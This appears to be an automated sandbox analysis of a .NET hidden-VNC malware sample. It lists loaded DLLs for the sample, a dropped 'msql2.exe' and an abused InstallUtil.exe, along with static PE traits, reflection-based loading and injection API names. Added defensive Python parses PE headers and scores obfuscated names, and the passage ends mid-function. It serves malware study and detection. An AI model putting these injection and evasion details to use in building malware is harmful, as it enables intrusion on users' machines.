Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: hvnc-CR-SCR-0710.bin.exe Static file information: File size 1489920 > 1048576
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x16b200
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003A49000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003762000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003A49000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003762000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp
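The "Static PE information" entries above (a CLR data directory, a .text section larger than 1 MiB in both virtual and raw size, a file over 1 MiB, and the five DllCharacteristics flags) are things a triage script can reproduce from the headers alone, without running the sample. The following is an added example, not part of the report or of Joe Sandbox's own tooling: a minimal PE header parser written against the PE specification, plus a builder that fabricates a PE32 header with the same static traits the report lists (sizes copied from the report, all contents zero filler). The builder is an assumption-free stand-in for the real file, which is not reproduced here.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bit values from the PE specification; the five
# names are the ones the report prints for this sample.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # slot of the CLR (.NET) header
ONE_MIB = 0x100000


def parse_pe(data: bytes) -> dict:
    """Parse just enough of a PE image (DOS stub, COFF, optional header, sections)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    _machine, nsec, _ts, _symtab, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:          # PE32: NumberOfRvaAndSizes at +92, directories at +96
        nrva_off, dd_off = opt + 92, opt + 96
    elif magic == 0x20B:        # PE32+: 64-bit ImageBase/stack/heap fields shift them
        nrva_off, dd_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]      # same offset in both formats
    nrva = struct.unpack_from("<I", data, nrva_off)[0]
    dirs = [struct.unpack_from("<II", data, dd_off + 8 * i) for i in range(nrva)]
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize, "rawptr": rawptr})
    return {"dllchar": dllchar, "dirs": dirs, "sections": sections, "size": len(data)}


def triage(data: bytes) -> dict:
    """Reproduce the report's static checks: managed image, oversized .text, flags."""
    pe = parse_pe(data)
    clr = pe["dirs"][IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] if len(pe["dirs"]) > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR else (0, 0)
    text = next((s for s in pe["sections"] if s["name"] == ".text"), None)
    return {
        "is_dotnet": clr[0] != 0 and clr[1] != 0,
        "text_vsize_over_1mib": bool(text and text["vsize"] > ONE_MIB),
        "text_rawsize_over_1mib": bool(text and text["rawsize"] > ONE_MIB),
        "file_over_1mib": pe["size"] > ONE_MIB,
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if pe["dllchar"] & bit],
    }


def build_sample_pe() -> bytes:
    """Constructed PE32 header with the report's static traits (not the real sample)."""
    text_size = 0x16B200          # .text raw/virtual size from the report
    hdr_size = 0x200              # headers padded to one file-alignment unit (assumption)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, one section, EXE|32BIT
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 32, 0x2000)                      # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)                       # FileAlignment
    struct.pack_into("<H", opt, 68, 2)                           # GUI subsystem
    struct.pack_into("<H", opt, 70, 0x8560)                      # the five flags the report names
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2008, 0x48)  # CLR header
    sec = struct.pack("<8sIIIIIIHHI", b".text", text_size, 0x2000, text_size, hdr_size, 0, 0, 0, 0, 0x60000020)
    header = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec).ljust(hdr_size, b"\0")
    # 0x800 bytes of trailing overlay bring the total to the report's 1489920 bytes.
    return header + b"\0" * text_size + b"\0" * 0x800
```

`triage(build_sample_pe())` reports a managed image with an oversized .text section and all five flags; run `triage(open(path, "rb").read())` on a real file. A .text section over 1 MiB in a managed executable is not malicious by itself, but combined with a CLR header it usually means an embedded resource blob (here the Costura-packed assemblies the report flags), which is why the sandbox scores it. Note that HIGH_ENTROPY_VA only affects 64-bit images; the report's `CLR_v4.0_32` usage-log path and `WOW6432Node` lookups show this sample runs as a 32-bit process, so the flag is set but inert.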

Data Obfuscation

barindex
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, CustomerExceptionDef.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: hvnc-CR-SCR-0710.bin.exe, ProxyRegModel.cs .Net Code: ResolveAccount System.AppDomain.Load(byte[])
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.3ea8a50.6.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6450000.8.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6450000.8.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6450000.8.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6450000.8.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6450000.8.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: Yara match File source: 0.2.hvnc-CR-SCR-0710.bin.exe.65f0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1745104377.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: hvnc-CR-SCR-0710.bin.exe PID: 7164, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msql2.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msql2.exe PID: 5356, type: MEMORYSTR
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_06402EA7 push esp; retf 0_2_06402EA8
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_0643E2B1 push es; ret 0_2_0643E2C0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_0643730A pushfd ; iretd 0_2_06437311
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_06430178 push es; ret 0_2_06430230
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064361AE pushad ; ret 0_2_064361B1
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064A1F09 push es; ret 0_2_064A1F28
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064AAAE6 push ebx; iretd 0_2_064AAAEC
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064A4181 push es; retf 0_2_064A418C
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064EDEC6 push ebp; retf 0_2_064EDECA
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064EDF10 push ecx; retf 0_2_064EDF17
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064E842E push cs; iretd 0_2_064E842F
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064EDB2E push es; iretd 0_2_064EDB39
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064EDBBA push es; ret 0_2_064EDBBC
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064EE072 push eax; retf 0_2_064EE074
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064F7DE6 push es; retf 0_2_064F7DEC
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FDA5E push es; ret 0_2_064FDA70
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_064FFBC0 push esp; iretd 0_2_064FFBC1
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_068C31AF push ebx; iretd 0_2_068C31B4
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 0_2_068C6905 push ebp; retf 0_2_068C6908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C903E push 8B0391DEh; iretd 1_2_056C9043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056CF833 pushfd ; ret 1_2_056CF839
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_056C9220 push esp; retf 1_2_056C9221
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06906C41 push es; iretd 1_2_06906C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_0690B277 push FFFFFF8Bh; iretd 1_2_0690B279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_0690892F push es; retf 1_2_06908930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06915F55 push es; ret 1_2_0691F180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06917AF1 push es; ret 1_2_0691F180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06946E76 push es; retf 1_2_06946E77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06941661 push es; iretd 1_2_06941680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_06941F41 push E8063C5Ch; ret 1_2_06941F51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_0694158A push es; retf 1_2_0694158C
Source: 0.2.hvnc-CR-SCR-0710.bin.exe.6160000.7.raw.unpack, rFREDnE8Q57vkPqId0l.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'ygNEwUWi3A', 'NtProtectVirtualMemory', 'ahZ1hiZi2CtiMVqstj1', 'S7sSiCZxubdpOksOSRV', 'BdrZXnZnOwSR7WfiEbv', 'xtWD9QZItrlQOrXJ60F'
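The "High entropy of concatenated method names" entry above mixes real NT API names (used for the injection routine) with renamer output such as `S7sSiCZxubdpOksOSRV`. The sandbox does not publish its exact scoring, so the following is an added example of one plausible way to implement that check, not Joe Sandbox's own code: Shannon entropy over the concatenated names, backed by a per-name heuristic (digits inside an identifier, or an uppercase ratio of 0.4 or more) so that a type with only a handful of members still scores. The 4.8-bit threshold and the heuristic cut-offs are assumptions chosen to separate the two constructed sets below; the benign set is taken from the helper and protobuf-net method names the report lists.

```python
import math
from collections import Counter

# Names quoted in the report's high-entropy entry for rFREDnE8Q57vkPqId0l.cs.
REPORTED_NAMES = [
    "RtlInitUnicodeString", "LdrLoadDll", "RtlZeroMemory", "NtQueryInformationProcess",
    "ygNEwUWi3A", "NtProtectVirtualMemory", "ahZ1hiZi2CtiMVqstj1",
    "S7sSiCZxubdpOksOSRV", "BdrZXnZnOwSR7WfiEbv", "xtWD9QZItrlQOrXJ60F",
]
# Constructed comparison set: ordinary method names the report lists elsewhere.
BENIGN_NAMES = [
    "InvokeMethod", "ReadObjectProperties", "TryDeserializeList", "Read",
    "CreateInstance", "EmitCreateInstance", "EmitCreateIfNull",
]


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's byte-frequency distribution (0.0 for empty input)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_generated(name: str) -> bool:
    """Per-name heuristic (assumption): digits or a high uppercase ratio suggest a renamer."""
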